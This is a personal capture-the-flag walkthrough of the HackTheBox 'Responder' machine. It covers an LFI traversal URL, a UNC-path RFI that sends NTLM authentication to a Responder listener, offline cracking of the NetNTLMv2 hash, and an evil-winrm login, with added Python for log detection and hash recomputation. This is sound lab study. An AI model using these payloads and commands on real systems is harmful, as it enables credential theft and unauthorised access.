Local File Inclusion (LFI) vulnerability, & Remote File Inclusion
This is a note for my HackTheBox practice. The machine being pwned here is called Responder.
Props to dotguy from HTB for sharing the knowledge. 🥂
Keywords : Responder utility, NetNTLMv2 hash, NTLM authentication, Local File Inclusion (LFI) vulnerability, Remote File Inclusion, WinRM service.
Main Concept
(Step 1) Enumeration with nmap
- nmap options to keep in mind
-v : Increase the verbosity level (basically output more info)
-p- : This flag scans for all TCP ports ranging from 0-65535
-sV : Attempts to determine the version of the service running on a port
-sC : Scan with default NSE scripts
--min-rate : This is used to specify the minimum number of packets Nmap should send per second; it speeds up the scan as the number goes higher
open TCP ports:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
80 : Hypertext Transfer Protocol (HTTP) uses TCP in versions 1.x and 2. HTTP/3 uses QUIC, a transport protocol on top of UDP.
5985 : Windows Remote Management service (WinRM over HTTP), the default port for PowerShell PSSession remoting
(Step 2) Website Enumeration
- entering http://[target ip] is not possible - the web server checks the domain name provided in the Host header field of the HTTP request (name-based virtual hosting).
- the /etc/hosts file is used to resolve a hostname into an IP address - we will need to add an entry in the /etc/hosts file for this domain to enable the browser to resolve the address for unika.htb.
- resolve the address with /etc/hosts :
$ echo "10.129.13.73 unika.htb" | sudo tee -a /etc/hosts
(Step 3) Looking into ‘File Inclusion Vulnerability’
traverse through the URL (Local File Inclusion (LFI) vulnerability) :
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
(Step 3.1) Responder Challenge Capture
‘Responder’ tool; how does it work?
Responder can do many different kinds of attacks, but for this scenario, it will set up a malicious SMB server.
- When the target machine attempts to perform the NTLM authentication to that server,
- Responder sends a challenge back for the target (the client) to encrypt with the user's password.
- When the target responds, Responder will use the challenge and the encrypted response to generate the NetNTLMv2.
- While we can't reverse the NetNTLMv2, we can try many different common passwords to see if any generate the same challenge response, and if we find one, we know that is the password.
- This is often referred to as hash cracking, which we’ll do with a program called John The Ripper.
in Responder.conf, confirm that SMB = On (set to listen for SMB requests)
[Responder Core]
; Servers to start
SQL = On
SMB = On
the target's IP had changed to 10.129.187.145 by this point (a new /etc/hosts entry was added with $ echo "10.129.187.145 unika.htb" | sudo tee -a /etc/hosts); output of Responder once started on the VPN interface ($ sudo responder -I tun0) :
<SNIP>
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.19] #SMB server's IP?
Responder IPv6 [dead:beef:4::1011]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-O9008WABG31]
Responder Domain Name [H8FX.LOCAL]
Responder DCE-RPC Port [47617]
<SNIP>
on Responder (on terminal), output after http://unika.htb/index.php?page=//10.10.16.19/whatever is keyed into the browser (Remote File Inclusion) :
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:10.129.187.145
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:af8154f76a06d<SNIP>
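As an added defender-side example (not from the original notes or the box), Python that flags the two inclusion vectors used above, the ../ traversal in the page parameter and the //host/share path that made the web server reach out over SMB, run over constructed Apache access-log lines:

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Vectors seen on this box: ../ traversal in the page parameter (LFI) and a //host/share UNC path
# that makes PHP's include() open an SMB connection to the attacker's listener (RFI / NTLM leak).
TRAVERSAL = re.compile(r"\.\.[/\\]")
REMOTE = re.compile(r"^(\\\\|//|[a-z][a-z0-9+.-]*://)", re.I)

def classify_request(request_line: str):
    # Return 'rfi', 'lfi' or None for a request line such as 'GET /index.php?page=... HTTP/1.1'.
    parts = request_line.split()
    if len(parts) < 2:
        return None
    for value in parse_qs(urlsplit(parts[1]).query).get("page", []):
        value = unquote(unquote(value))  # parse_qs decoded once; decode twice more so doubly encoded ../ is still caught
        if REMOTE.match(value):
            return "rfi"
        if TRAVERSAL.search(value) or value.lower().startswith(("/", "c:")):  # index.php only expects relative names
            return "lfi"
    return None

def scan_access_log(lines):
    # Yield (client_ip, verdict, request) for Apache combined-log lines that look like file inclusion.
    for line in lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"', line)
        if not m:
            continue
        verdict = classify_request(m.group(2))
        if verdict:
            yield m.group(1), verdict, m.group(2)

# Constructed sample log lines (not the box's real logs); the client IP is the one Responder listened on above.
SAMPLE_LOG = [
    '10.10.16.19 - - [15/Apr/2022:09:10:01 +0000] "GET /index.php?page=home.html HTTP/1.1" 200 1234',
    '10.10.16.19 - - [15/Apr/2022:09:11:30 +0000] "GET /index.php?page=../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824',
    '10.10.16.19 - - [15/Apr/2022:09:12:05 +0000] "GET /index.php?page=//10.10.16.19/whatever HTTP/1.1" 200 0',
    '10.10.16.19 - - [15/Apr/2022:09:12:40 +0000] "GET /index.php?page=..%252F..%252Fwindows%252Fsystem32%252Fdrivers%252Fetc%252Fhosts HTTP/1.1" 200 824',
]

for ip, verdict, req in scan_access_log(SAMPLE_LOG):
    print(ip, verdict, req)
```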
(Step 4) Hash Cracking
using John The Ripper ($ john) ; option -w
-w : wordlist to use for cracking the hash
output
└─$ john -w=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-04-15 09:21) 25.00g/s 102400p/s 102400c/s 102400C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
password : badminton (Administrator)
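As an added example (not part of the original notes, nor Responder's or john's code), the challenge-response described in Step 3.1 worked through in Python, which is also what the john run above does per candidate: the client's NTProofStr is an HMAC-MD5 keyed by a hash of the password over the server challenge, so each wordlist word can be recomputed and compared offline. The challenge, blob and captured line below are constructed, not the box's real capture:

```python
import hashlib, hmac, struct

def md4(data: bytes) -> bytes:
    # Pure-Python MD4 (RFC 1320): hashlib's md4 is disabled on many OpenSSL 3 builds.
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, n: ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x, (aa, bb, cc, dd) = struct.unpack("<16I", msg[off:off + 64]), (a, b, c, d)
        for r in range(48):  # three rounds of 16 steps; k = word index, s = rotation
            if r < 16:
                f, k, s, add = F, r, (3, 7, 11, 19)[r % 4], 0
            elif r < 32:
                f, k, s, add = G, (r % 4) * 4 + (r // 4) % 4, (3, 5, 9, 13)[r % 4], 0x5A827999
            else:
                f, k, s, add = H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[r % 16], (3, 9, 11, 15)[r % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + f(b, c, d) + x[k] + add) & 0xFFFFFFFF, s), b, c
        a, b, c, d = [(v + w) & 0xFFFFFFFF for v, w in ((a, aa), (b, bb), (c, cc), (d, dd))]
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))  # NTHash, the form Windows stores in the SAM

def net_ntlmv2_proof(password, user, domain, server_challenge, blob) -> bytes:
    # NTLMv2 key = HMAC-MD5(NTHash, UPPER(user) + domain); NTProofStr = HMAC-MD5(key, challenge || blob)
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()

def check_wordlist(captured_line: str, wordlist):
    # Parse the 'User::Domain:challenge:NTProofStr:blob' line Responder prints (the layout john reads)
    # and return the first candidate whose recomputed NTProofStr matches, else None.
    user, _, rest = captured_line.partition("::")
    domain, chal, proof, blob = rest.split(":")
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for candidate in wordlist:
        if hmac.compare_digest(net_ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None

# Constructed sample exchange (not the real capture from the box): an 8-byte server challenge, a
# minimal NTLMv2 blob, and the response the client would send for the password 'badminton'.
SAMPLE_CHALLENGE = bytes.fromhex("0011223344556677")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011" + "00" * 8)
SAMPLE_LINE = "Administrator::RESPONDER:%s:%s:%s" % (SAMPLE_CHALLENGE.hex(),
    net_ntlmv2_proof("badminton", "Administrator", "RESPONDER", SAMPLE_CHALLENGE, SAMPLE_BLOB).hex(),
    SAMPLE_BLOB.hex())
print(check_wordlist(SAMPLE_LINE, ["slimshady", "oooooo", "badminton"]))  # badminton
```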
then use EvilWinRM
evil-winrm -i 10.129.187.145 -u administrator -p badminton
finding the flag;
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users> cd mike\Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> more flag.txt
[FLAG WRITTEN HERE]
Tools, Commands
More notes
- most organizations use Active Directory to set up their Windows domain networks.
- Microsoft employs NTLM (New Technology LAN Manager) & Kerberos for authentication services.
- File Inclusion vulnerability, on Windows machines.
- NTLMv2 (or more formally Net-NTLMv2) is a challenge-response authentication protocol that Windows clients use to authenticate to other Windows servers.
- TCP ports source
- Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol that basically uses Simple Object Access Protocol to interact with remote computers and servers, as well as Operating Systems and applications.
- Name-Based Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server. This allows one server to share its resources, such as memory and processor cycles, without requiring all the services to be used by the same hostname.
- resolve address (in computing)
- sanitization (in computing) : for security purposes, we protect the system from malicious data.
- include() method of PHP : The include statement takes all the text/code/markup that exists in the specified file and loads it into the memory, making it available for use.
- example
  File 1 --> vars.php
    <?php
    $color = 'green';
    $fruit = 'apple';
    ?>
  File 2 --> test.php
    <?php
    echo "A $color $fruit"; // output = "A"
    include 'vars.php';
    echo "A $color $fruit"; // output = "A green apple"
    ?>
- A hash function is a one way function that takes any amount of data and returns a fixed size value.
- An NTHash is the output of the algorithm used to store passwords on Windows systems in the SAM database and on domain controllers.
- NTLM ; challenge / response model ; Challenge–response authentication
- to test with some commonly known files that will have the same name across networks, Windows domains, and systems which can be found here.
- SMB URLs
- SMB server
- SMB share
- python3 -I : this option can be used to run the script in isolated mode where sys.path contains neither the current directory nor the user's site-packages directory.
- Which flag do we use in the Responder utility to specify the network interface?
- WinRM service
- evilWinRM : https://github.com/Hackplayers/evil-winrm
- 5985 : We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?
Disclaimer : Some of the words here are not written by me. This page serves merely as my notes.